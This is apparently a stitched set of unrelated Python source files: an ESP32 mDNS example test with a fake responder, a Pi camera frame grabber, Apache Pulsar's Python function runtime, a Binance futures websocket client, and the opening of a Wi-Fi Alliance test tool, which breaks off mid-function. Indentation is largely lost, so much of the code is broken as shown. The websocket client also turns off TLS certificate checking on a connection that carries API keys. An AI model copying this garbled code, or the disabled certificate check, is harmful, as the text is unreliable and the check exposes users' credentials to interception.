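    # The canned bytes below are a pre-built A-record response (one question, one
    # answer); only the packet layout is reused, since the name, addresses and
    # transaction id are all overwritten before the reply is sent.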
dns = dpkt.dns.DNS(b"\x5e\x39\x84\x00\x00\x01\x00\x01\x00\x00\x00\x00\x0a\x64\x61\x76\x69\x64"
b"\x2d\x63\x6f\x6d\x70\x05\x6c\x6f\x63\x61\x6c\x00\x00\x01\x00\x01\xc0\x0c"
b"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x04\xc0\xa8\x0a\x6c")
dns.qd[0].name = tester_host
dns.an[0].name = tester_host
dns.an[0].ip = socket.inet_aton('127.0.0.1')
dns.an[0].rdata = socket.inet_aton('127.0.0.1')
dns.id = id
print("Created answer to mdns (lwip) query: {} ".format(dns.__repr__()))
return dns.pack()
def mdns_server(esp_host):
global esp_answered
UDP_IP = "0.0.0.0"
UDP_PORT = 5353
MCAST_GRP = '224.0.0.251'
TESTER_NAME = u'tinytester.local'
TESTER_NAME_LWIP = u'tinytester-lwip.local'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
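    # Joining the 224.0.0.251 multicast group (on all interfaces) is what lets this
    # fake responder see the DUT's mDNS traffic on UDP port 5353.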
sock.settimeout(30)
while not stop_mdns_server.is_set():
try:
if not esp_answered.is_set():
sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
time.sleep(0.2)
data, addr = sock.recvfrom(1024)
dns = dpkt.dns.DNS(data)
if len(dns.qd) > 0 and dns.qd[0].type == dpkt.dns.DNS_A:
if dns.qd[0].name == TESTER_NAME:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(TESTER_NAME), (MCAST_GRP,UDP_PORT))
elif dns.qd[0].name == TESTER_NAME_LWIP:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns_lwip(TESTER_NAME_LWIP, dns.id), addr)
if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
if dns.an[0].name == esp_host + u'.local':
print("Received answer to esp32-mdns query: {}".format(dns.__repr__()))
esp_answered.set()
except socket.timeout:
break
except dpkt.UnpackError:
continue
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mdns(env, extra_data):
    """
    steps: |
      1. join AP + init mdns example
      2. get the dut host name (and IP address)
      3. check the mdns name is accessible
      4. check DUT output if mdns advertised host is resolved
    """
    global stop_mdns_server
dut1 = env.get_dut("mdns-test", "examples/protocols/mdns", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mdns-test.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("mdns-test_bin_size", "{}KB".format(bin_size // 1024))
# 1. start mdns application
dut1.start_app()
# 2. get the dut host name (and IP address)
specific_host = dut1.expect(re.compile(r"mdns hostname set to: \[([^\]]+)\]"), timeout=30)
specific_host = str(specific_host[0])
thread1 = Thread(target=mdns_server, args=(specific_host,))
thread1.start()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)[0]
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
stop_mdns_server.set()
thread1.join()
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
try:
# 3. check the mdns name is accessible
if not esp_answered.wait(timeout=30):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
        # 4. check DUT output if mdns advertised host is resolved
dut1.expect(re.compile(r"mdns-test: Query A: tinytester.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: gethostbyname: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: getaddrinfo: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
# 5. check the DUT answers to `dig` command
dig_output = subprocess.check_output(['dig', '+short', '-p', '5353', '@224.0.0.251',
'{}.local'.format(specific_host)])
print('Resolving {} using "dig" succeeded with:\n{}'.format(specific_host, dig_output))
if not ip_address.encode('utf-8') in dig_output:
raise ValueError("Test has failed: Incorrectly resolved DUT hostname using dig"
"Output should've contained DUT's IP address:{}".format(ip_address))
finally:
stop_mdns_server.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mdns()
|
cam_processor.py
|
import cv2
import queue
import threading
import time
import numpy as np
#from imutils.video import pivideostream as VideoStream
from imutils.video import VideoStream
#import imutilsx.video.videostream.py
#from lib import
class cam_processor:
def __init__(self,
out_queue,
cap_frame_width = 640,
cap_frame_height = 480,
cap_framerate = 32,
out_queue_full_sleep = .1,
out_queue_max_wait = 0.01,
input_source = ''):
self._out_queue_full_sleep = out_queue_full_sleep
self._out_queue_max_wait = out_queue_max_wait
self._pause_mode = False
self._ready = False
self._error = ''
self._working = False
self._stop_flag = False
self._cap_frame_width = cap_frame_width
self._cap_frame_height = cap_frame_height
self._cap_framerate = cap_framerate
#Get the camera
#vs = VideoStream(usePiCamera=True).start()
#vs.resolution( cap_frame_width, cap_frame_height)
#self._video_stream = vs
#self._video_stream.start()
if input_source == '':
print ('Using Pi Camera')
self._video_stream = VideoStream(usePiCamera=True,
resolution=(self._cap_frame_width, self._cap_frame_height),
framerate = self._cap_framerate).start()
else:
print ('Using Input Source: ', input_source)
self._video_stream = VideoStream(input_source, usePiCamera=False,
resolution=(self._cap_frame_width, self._cap_frame_height),
framerate = self._cap_framerate).start()
time.sleep(2)
self._ready = True
# TODO Create own capture class that doesn't use imutils, but uses picamera
# TODO Then, we could capture at different resolutions via splitter
# See: https://picamera.readthedocs.io/en/release-1.13/recipes2.html
# 4.12. Recording at multiple resolutions
# Another option is circular video record
# and grab a frame and put it on the output queue any time it is empty
# because when the image is analyzed, it is taken off the queue
# this would ensure it's processing the most recent, not the image from
# a few seconds ago
# circular video recording is FAF (fast as f...)
# So this would, perhaps, make the NCS processing thread the bottle neck
#self._video_stream.resolution( cap_frame_width, cap_frame_height)
self._out_queue = out_queue
self._worker_thread = threading.Thread(target=self._do_work, args=())
self._ready = True
def start_processing(self):
self._stop_flag = False
self._worker_thread.start()
def stop_processing(self):
self._stop_flag = True
self._worker_thread.join()
self._worker_thread = None
def _do_work(self):
if (self._video_stream is None):
self._ready = False
self._working = False
self._stop_flag = True
return
print ('Cam processor starting')
frame = self._video_stream.read()
(h, w) = frame.shape[:2]
print('CAPTURING AT ',w, ' by ',h)
while not self._stop_flag:
try:
while (not self._stop_flag):
                    # TODO Test performance here with a pass if self._out_queue.full() is true
                    # Why grab a frame if we can't put it on the queue?
                    # if (self._out_queue.full()): pass
# other option is to while (not self._out_queue.full()):
frame = self._video_stream.read()
# (h, w) = frame.shape[:2]
# print('h,w ',h,w)
#frame = cv2.resize(frame, (self._cap_frame_width, self._cap_frame_height))
# self._out_queue.put(frame, True, self._out_queue_full_sleep)
self._out_queue.put_nowait(frame)
#print ('frame to queue - length: ', self._out_queue.__len__)
#print ('frame ')
            except queue.Full:
                # Output queue is full; back off briefly before grabbing the next frame.
                time.sleep(self._out_queue_full_sleep)
            except Exception:
                # Keep the capture loop alive on unexpected, transient read errors.
                time.sleep(self._out_queue_full_sleep)
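
# Editor's note (hedged sketch, not part of cam_processor): the TODO comments in
# __init__ talk about always handing the consumer the *most recent* frame instead of
# one captured seconds ago.  One stdlib-only way to get that behaviour with the
# existing queue.Queue is a "drop the stale frame, keep the fresh one" put, sketched
# below.  The helper name is hypothetical and nothing in this file calls it.
def _put_latest(frame_queue, frame):
    try:
        frame_queue.put_nowait(frame)
    except queue.Full:
        try:
            frame_queue.get_nowait()       # discard the stale frame
        except queue.Empty:
            pass                           # consumer drained it in the meantime
        try:
            frame_queue.put_nowait(frame)  # enqueue the fresh frame
        except queue.Full:
            pass                           # another producer won the race; skip this one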
|
python_instance.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -*- encoding: utf-8 -*-
"""python_instance.py: Python Instance for running python functions
"""
import base64
import os
import signal
import time
try:
import Queue as queue
except ImportError:
import queue
import threading
from functools import partial
from collections import namedtuple
from threading import Timer
import traceback
import sys
import re
import pulsar
import contextimpl
import Function_pb2
import log
import util
import InstanceCommunication_pb2
Log = log.Log
# Equivalent of the InstanceConfig in Java
InstanceConfig = namedtuple('InstanceConfig', 'instance_id function_id function_version function_details max_buffered_tuples')
# This is the message that the consumers put on the queue for the function thread to process
InternalMessage = namedtuple('InternalMessage', 'message topic serde consumer')
InternalQuitMessage = namedtuple('InternalQuitMessage', 'quit')
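# InternalQuitMessage is a shutdown sentinel: placing one on the work queue makes
# actual_execution() break out of its blocking queue.get() loop (see below).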
DEFAULT_SERIALIZER = "serde.IdentitySerDe"
PY3 = sys.version_info[0] >= 3
def base64ify(bytes_or_str):
if PY3 and isinstance(bytes_or_str, str):
input_bytes = bytes_or_str.encode('utf8')
else:
input_bytes = bytes_or_str
output_bytes = base64.urlsafe_b64encode(input_bytes)
if PY3:
return output_bytes.decode('ascii')
else:
return output_bytes
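
# Editor's note (illustrative, not part of the Pulsar runtime): base64ify() always yields
# URL-safe base64 text on Python 3, whether it is handed str or bytes.  A tiny self-check,
# never invoked by the instance:
def _base64ify_demo():
    expected = "aGVsbG8=" if PY3 else b"aGVsbG8="
    assert base64ify("hello") == expected
    assert base64ify(b"hello") == expected
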
# We keep track of the following metrics
class Stats(object):
def __init__(self):
self.reset()
def reset(self):
self.nprocessed = 0
self.nsuccessfullyprocessed = 0
self.nuserexceptions = 0
self.latestuserexceptions = []
self.nsystemexceptions = 0
self.latestsystemexceptions = []
self.ndeserialization_exceptions = {}
self.nserialization_exceptions = 0
self.latency = 0
self.lastinvocationtime = 0
def increment_deser_errors(self, topic):
if topic not in self.ndeserialization_exceptions:
self.ndeserialization_exceptions[topic] = 0
self.ndeserialization_exceptions[topic] += 1
def increment_successfully_processed(self, latency):
self.nsuccessfullyprocessed += 1
self.latency += latency
def increment_processed(self, processed_at):
self.nprocessed += 1
self.lastinvocationtime = processed_at
def record_user_exception(self, ex):
self.latestuserexceptions.append((traceback.format_exc(), int(time.time() * 1000)))
if len(self.latestuserexceptions) > 10:
self.latestuserexceptions.pop(0)
self.nuserexceptions = self.nuserexceptions + 1
def record_system_exception(self, ex):
self.latestsystemexceptions.append((traceback.format_exc(), int(time.time() * 1000)))
if len(self.latestsystemexceptions) > 10:
self.latestsystemexceptions.pop(0)
self.nsystemexceptions = self.nsystemexceptions + 1
def compute_latency(self):
if self.nsuccessfullyprocessed <= 0:
return 0
else:
return self.latency / self.nsuccessfullyprocessed
def update(self, object):
self.nprocessed = object.nprocessed
self.nsuccessfullyprocessed = object.nsuccessfullyprocessed
self.nuserexceptions = object.nuserexceptions
self.nsystemexceptions = object.nsystemexceptions
self.nserialization_exceptions = object.nserialization_exceptions
self.latency = object.latency
self.lastinvocationtime = object.lastinvocationtime
self.latestuserexceptions = []
self.latestsystemexceptions = []
self.ndeserialization_exceptions.clear()
        self.latestuserexceptions.extend(object.latestuserexceptions)
        self.latestsystemexceptions.extend(object.latestsystemexceptions)
self.ndeserialization_exceptions.update(object.ndeserialization_exceptions)
class PythonInstance(object):
def __init__(self, instance_id, function_id, function_version, function_details, max_buffered_tuples, expected_healthcheck_interval, user_code, pulsar_client):
self.instance_config = InstanceConfig(instance_id, function_id, function_version, function_details, max_buffered_tuples)
self.user_code = user_code
self.queue = queue.Queue(max_buffered_tuples)
self.log_topic_handler = None
if function_details.logTopic is not None and function_details.logTopic != "":
self.log_topic_handler = log.LogTopicHandler(str(function_details.logTopic), pulsar_client)
self.pulsar_client = pulsar_client
self.input_serdes = {}
self.consumers = {}
self.output_serde = None
self.function_class = None
self.function_purefunction = None
self.producer = None
self.exeuction_thread = None
self.atmost_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATMOST_ONCE')
self.atleast_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATLEAST_ONCE')
self.auto_ack = self.instance_config.function_details.autoAck
self.contextimpl = None
self.total_stats = Stats()
self.current_stats = Stats()
self.stats = Stats()
self.last_health_check_ts = time.time()
self.timeout_ms = function_details.source.timeoutMs if function_details.source.timeoutMs > 0 else None
self.expected_healthcheck_interval = expected_healthcheck_interval
def health_check(self):
self.last_health_check_ts = time.time()
health_check_result = InstanceCommunication_pb2.HealthCheckResult()
health_check_result.success = True
return health_check_result
def process_spawner_health_check_timer(self):
if time.time() - self.last_health_check_ts > self.expected_healthcheck_interval * 3:
Log.critical("Haven't received health check from spawner in a while. Stopping instance...")
os.kill(os.getpid(), signal.SIGKILL)
sys.exit(1)
Timer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer).start()
def run(self):
# Setup consumers and input deserializers
mode = pulsar._pulsar.ConsumerType.Shared
if self.instance_config.function_details.source.subscriptionType == Function_pb2.SubscriptionType.Value("FAILOVER"):
mode = pulsar._pulsar.ConsumerType.Failover
subscription_name = str(self.instance_config.function_details.tenant) + "/" + \
str(self.instance_config.function_details.namespace) + "/" + \
str(self.instance_config.function_details.name)
for topic, serde in self.instance_config.function_details.source.topicsToSerDeClassName.items():
if not serde:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), serde)
self.input_serdes[topic] = serde_kclass()
Log.info("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
for topic, consumer_conf in self.instance_config.function_details.source.inputSpecs.items():
if not consumer_conf.serdeClassName:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), consumer_conf.serdeClassName)
self.input_serdes[topic] = serde_kclass()
Log.info("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
if consumer_conf.isRegexPattern:
self.consumers[topic] = self.pulsar_client.subscribe(
re.compile(str(topic)), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
else:
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
function_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.className)
if function_kclass is None:
Log.critical("Could not import User Function Module %s" % self.instance_config.function_details.className)
raise NameError("Could not import User Function Module %s" % self.instance_config.function_details.className)
try:
self.function_class = function_kclass()
except:
self.function_purefunction = function_kclass
self.contextimpl = contextimpl.ContextImpl(self.instance_config, Log, self.pulsar_client, self.user_code, self.consumers)
# Now launch a thread that does execution
        self.execution_thread = threading.Thread(target=self.actual_execution)
        self.execution_thread.start()
        # start process spawner health check timer
self.last_health_check_ts = time.time()
if self.expected_healthcheck_interval > 0:
Timer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer).start()
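    # Execution loop: blocks on the internal queue, deserializes each message,
    # invokes the user function, records latency and exception stats, and hands any
    # return value to process_result(); an InternalQuitMessage ends the loop.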
def actual_execution(self):
Log.info("Started Thread for executing the function")
while True:
msg = self.queue.get(True)
if isinstance(msg, InternalQuitMessage):
break
user_exception = False
system_exception = False
Log.debug("Got a message from topic %s" % msg.topic)
input_object = None
try:
input_object = msg.serde.deserialize(msg.message.data())
except:
self.current_stats.increment_deser_errors(msg.topic)
self.total_stats.increment_deser_errors(msg.topic)
continue
self.contextimpl.set_current_message_context(msg.message.message_id(), msg.topic)
output_object = None
self.saved_log_handler = None
if self.log_topic_handler is not None:
self.saved_log_handler = log.remove_all_handlers()
log.add_handler(self.log_topic_handler)
start_time = time.time()
self.current_stats.increment_processed(int(start_time) * 1000)
self.total_stats.increment_processed(int(start_time) * 1000)
successfully_executed = False
try:
if self.function_class is not None:
output_object = self.function_class.process(input_object, self.contextimpl)
else:
output_object = self.function_purefunction.process(input_object)
successfully_executed = True
except Exception as e:
Log.exception("Exception while executing user method")
self.total_stats.record_user_exception(e)
self.current_stats.record_user_exception(e)
end_time = time.time()
latency = (end_time - start_time) * 1000
self.total_stats.increment_successfully_processed(latency)
self.current_stats.increment_successfully_processed(latency)
if self.log_topic_handler is not None:
log.remove_all_handlers()
log.add_handler(self.saved_log_handler)
if successfully_executed:
self.process_result(output_object, msg)
def done_producing(self, consumer, orig_message, result, sent_message):
if result == pulsar.Result.Ok and self.auto_ack and self.atleast_once:
consumer.acknowledge(orig_message)
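    # process_result() serializes a non-None return value and publishes it
    # asynchronously to the sink topic; with auto-ack and ATLEAST_ONCE the source
    # message is acknowledged from the producer callback above, or directly when
    # the function returned no output.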
def process_result(self, output, msg):
if output is not None:
output_bytes = None
if self.output_serde is None:
self.setup_output_serde()
if self.producer is None:
self.setup_producer()
try:
output_bytes = self.output_serde.serialize(output)
except:
self.current_stats.nserialization_exceptions += 1
self.total_stats.nserialization_exceptions += 1
if output_bytes is not None:
props = {"__pfn_input_topic__" : str(msg.topic), "__pfn_input_msg_id__" : base64ify(msg.message.message_id().serialize())}
try:
self.producer.send_async(output_bytes, partial(self.done_producing, msg.consumer, msg.message), properties=props)
except Exception as e:
self.current_stats.record_system_exception(e)
self.total_stats.record_system_exception(e)
elif self.auto_ack and self.atleast_once:
msg.consumer.acknowledge(msg.message)
def setup_output_serde(self):
        if self.instance_config.function_details.sink.serDeClassName is not None and \
len(self.instance_config.function_details.sink.serDeClassName) > 0:
serde_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.sink.serDeClassName)
self.output_serde = serde_kclass()
else:
global DEFAULT_SERIALIZER
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
self.output_serde = serde_kclass()
def setup_producer(self):
        if self.instance_config.function_details.sink.topic is not None and \
len(self.instance_config.function_details.sink.topic) > 0:
Log.info("Setting up producer for topic %s" % self.instance_config.function_details.sink.topic)
self.producer = self.pulsar_client.create_producer(
str(self.instance_config.function_details.sink.topic),
block_if_queue_full=True,
batching_enabled=True,
batching_max_publish_delay_ms=1,
max_pending_messages=100000)
def message_listener(self, serde, consumer, message):
item = InternalMessage(message, consumer.topic(), serde, consumer)
self.queue.put(item, True)
if self.atmost_once and self.auto_ack:
consumer.acknowledge(message)
def get_and_reset_metrics(self):
# First get any user metrics
metrics = self.get_metrics()
self.reset_metrics()
return metrics
def reset_metrics(self):
self.stats.update(self.current_stats)
self.current_stats.reset()
self.contextimpl.reset_metrics()
def get_metrics(self):
# First get any user metrics
metrics = self.contextimpl.get_metrics()
# Now add system metrics as well
self.add_system_metrics("__total_processed__", self.stats.nprocessed, metrics)
self.add_system_metrics("__total_successfully_processed__", self.stats.nsuccessfullyprocessed, metrics)
self.add_system_metrics("__total_system_exceptions__", self.stats.nsystemexceptions, metrics)
self.add_system_metrics("__total_user_exceptions__", self.stats.nuserexceptions, metrics)
for (topic, metric) in self.stats.ndeserialization_exceptions.items():
self.add_system_metrics("__total_deserialization_exceptions__" + topic, metric, metrics)
self.add_system_metrics("__total_serialization_exceptions__", self.stats.nserialization_exceptions, metrics)
self.add_system_metrics("__avg_latency_ms__", self.stats.compute_latency(), metrics)
return metrics
def add_system_metrics(self, metric_name, value, metrics):
metrics.metrics[metric_name].count = value
metrics.metrics[metric_name].sum = value
metrics.metrics[metric_name].min = 0
metrics.metrics[metric_name].max = value
def get_function_status(self):
status = InstanceCommunication_pb2.FunctionStatus()
status.running = True
status.numProcessed = self.total_stats.nprocessed
status.numSuccessfullyProcessed = self.total_stats.nsuccessfullyprocessed
status.numUserExceptions = self.total_stats.nuserexceptions
status.instanceId = self.instance_config.instance_id
for ex, tm in self.total_stats.latestuserexceptions:
to_add = status.latestUserExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.numSystemExceptions = self.total_stats.nsystemexceptions
for ex, tm in self.total_stats.latestsystemexceptions:
to_add = status.latestSystemExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
for (topic, metric) in self.total_stats.ndeserialization_exceptions.items():
status.deserializationExceptions[topic] = metric
status.serializationExceptions = self.total_stats.nserialization_exceptions
status.averageLatency = self.total_stats.compute_latency()
status.lastInvocationTime = self.total_stats.lastinvocationtime
status.metrics.CopyFrom(self.get_metrics())
return status
def join(self):
self.queue.put(InternalQuitMessage(True), True)
        self.execution_thread.join()
|
websocketconnection.py
|
import threading
import websocket
import gzip
import ssl
import logging
from urllib import parse
import urllib.parse
# from binance_f.base.printtime import PrintDate
from binance_f.impl.utils.timeservice import get_current_timestamp
from binance_f.impl.utils.urlparamsbuilder import UrlParamsBuilder
from binance_f.impl.utils.apisignature import create_signature
from binance_f.exception.binanceapiexception import BinanceApiException
from binance_f.impl.utils import *
# from binance_f.base.printobject import *
from binance_f.model.constant import *
# Key: ws, Value: connection
websocket_connection_handler = dict()
def on_message(ws, message):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_message(message)
return
def on_error(ws, error):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_failure(error)
def on_close(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_close()
def on_open(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_open(ws)
connection_id = 0
class ConnectionState:
IDLE = 0
CONNECTED = 1
CLOSED_ON_ERROR = 2
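# Thread entry point: builds the WebSocketApp for one connection, registers it in
# websocket_connection_handler and blocks in run_forever() until the socket closes.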
def websocket_func(*args):
connection_instance = args[0]
connection_instance.ws = websocket.WebSocketApp(connection_instance.url,
on_message=on_message,
on_error=on_error,
on_close=on_close)
global websocket_connection_handler
websocket_connection_handler[connection_instance.ws] = connection_instance
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connecting...")
connection_instance.delay_in_second = -1
connection_instance.ws.on_open = on_open
connection_instance.ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connection event loop down")
if connection_instance.state == ConnectionState.CONNECTED:
connection_instance.state = ConnectionState.IDLE
class WebsocketConnection:
def __init__(self, api_key, secret_key, uri, watch_dog, request):
self.__thread = None
self.url = uri
self.__api_key = api_key
self.__secret_key = secret_key
self.request = request
self.__watch_dog = watch_dog
self.delay_in_second = -1
self.ws = None
self.last_receive_time = 0
self.logger = logging.getLogger("binance-futures")
self.state = ConnectionState.IDLE
global connection_id
connection_id += 1
self.id = connection_id
def in_delay_connection(self):
return self.delay_in_second != -1
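    # re_connect_in_delay() closes the socket and arms a countdown; each call to
    # re_connect() decrements it and reopens the connection once it reaches zero.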
def re_connect_in_delay(self, delay_in_second):
if self.ws is not None:
self.ws.close()
self.ws = None
self.delay_in_second = delay_in_second
        self.logger.warning("[Sub][" + str(self.id) + "] Reconnecting in "
                            + str(self.delay_in_second) + " seconds")
def re_connect(self):
if self.delay_in_second != 0:
self.delay_in_second -= 1
self.logger.warning("In delay connection: " + str(self.delay_in_second))
else:
self.connect()
def connect(self):
if self.state == ConnectionState.CONNECTED:
self.logger.info("[Sub][" + str(self.id) + "] Already connected")
else:
self.__thread = threading.Thread(target=websocket_func, args=[self])
self.__thread.start()
def send(self, data):
self.ws.send(data)
def close(self):
self.ws.close()
del websocket_connection_handler[self.ws]
self.__watch_dog.on_connection_closed(self)
        self.logger.info("[Sub][" + str(self.id) + "] Closing normally")
def on_open(self, ws):
self.logger.info("[Sub][" + str(self.id) + "] Connected to server")
self.ws = ws
self.last_receive_time = get_current_timestamp()
self.state = ConnectionState.CONNECTED
self.__watch_dog.on_connection_created(self)
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
return
def on_error(self, error_message):
if self.request.error_handler is not None:
exception = BinanceApiException(BinanceApiException.SUBSCRIPTION_ERROR, error_message)
self.request.error_handler(exception)
self.logger.error("[Sub][" + str(self.id) + "] " + str(error_message))
def on_failure(self, error):
self.on_error("Unexpected error: " + str(error))
self.close_on_error()
def on_message(self, message):
self.last_receive_time = get_current_timestamp()
json_wrapper = parse_json_from_string(message)
if json_wrapper.contain_key("status") and json_wrapper.get_string("status") != "ok":
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("err-code") and json_wrapper.get_int("err-code") != 0:
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("result") and json_wrapper.contain_key("id"):
self.__on_receive_response(json_wrapper)
else:
self.__on_receive_payload(json_wrapper)
def __on_receive_response(self, json_wrapper):
res = None
try:
res = json_wrapper.get_int("id")
except Exception as e:
self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(SubscribeMessageType.RESPONSE, res)
except Exception as e:
self.on_error("Process error: " + str(e)
+ " You should capture the exception in your error handler")
def __on_receive_payload(self, json_wrapper):
res = None
try:
if self.request.json_parser is not None:
res = self.request.json_parser(json_wrapper)
except Exception as e:
self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(SubscribeMessageType.PAYLOAD, res)
except Exception as e:
self.on_error("Process error: " + str(e)
+ " You should capture the exception in your error handler")
if self.request.auto_close:
self.close()
def __process_ping_on_trading_line(self, ping_ts):
self.send("{\"op\":\"pong\",\"ts\":" + str(ping_ts) + "}")
return
def __process_ping_on_market_line(self, ping_ts):
self.send("{\"pong\":" + str(ping_ts) + "}")
return
def close_on_error(self):
if self.ws is not None:
self.ws.close()
self.state = ConnectionState.CLOSED_ON_ERROR
self.logger.error("[Sub][" + str(self.id) + "] Connection is closing due to error")
|
wts.py
|
#!/usr/bin/env python
###############################################################################
#
# Copyright (c) 2016 Wi-Fi Alliance
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
# RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE
# USE OR PERFORMANCE OF THIS SOFTWARE.
#
###############################################################################
import argparse
from operator import itemgetter
import sys
import os
import re
import threading
from socket import *
import core.parser
import scriptinfo.scriptsource
import core.initializer
from common import *
from util.misc import Util
from core.executor import Executor
from features import display_val_result
from features.usermode import UserMode
from frontend.cli import FrontendCli, FrontendCliServer
from scriptinfo.scriptsource import TestLogFileSource
from security.filesec import ScriptsSecurity
from dbaccess import historydb
from core.symtable import TestScriptSymbolTable
from security.filelocker import ReadFileBusy
from features.validation import Validation
from netcomm.netsocket import NetCommClient
from netcomm.netsocket import NetCommServer
class UserRequestAction:
    """A thread class to handle user requests passed in through the front-end controller.
Attributes:
usr_in_cmd (object): The object of UserCommand class.
user_mode (object): The object of UserMode class.
is_running (boolean): The while loop stops when it is False.
        req_hdl_dict (dictionary): Stores the mappings of user commands to their handling functions.
"""
def __init__(self):
self.is_running = True
self.usr_in_cmd = None
self.user_mode = UserMode()
self.req_hdl_dict = {
UserCommand.GET_DEFAULT_USER_MODE: self.get_default_user_mode,
UserCommand.GET_CURRENT_USER_MODE: self.get_curr_user_mode,
UserCommand.SET_DEFAULT_USER_MODE: self.set_default_user_mode,
UserCommand.SET_CURRENT_USER_MODE: self.set_curr_user_mode,
UserCommand.SHOW_USER_MODE: self.show_user_mode,
UserCommand.STOP_TEST_RUN: self.stop_test_run,
UserCommand.SHOW_WTS_VERSION: self.get_wts_ver
}
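    # Dispatcher loop: polls the request queue roughly once per second, rejects
    # execution and user-mode changes while a test case is running, and routes
    # recognised query commands through req_hdl_dict.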
def user_request_dispatcher(self):
"""Dispatches user requests to different user mode request handlers.
"""
while self.is_running:
item = GlobalConfigFiles.usr_req_que.dequeue()
if item is not None:
if isinstance(item.cmd, TestExecutionCommand):
run_status = TestFlowController.get_test_flow_status()
if run_status == TestFlowController.TEST_FLOW_STATUS_RUNNING:
resp_item = item
resp_item.cmd.status = UserCommand.ERROR
resp_item.cmd.err_msg = "Test case %s currently running, please wait or stop the test" % GlobalConfigFiles.curr_tc_name
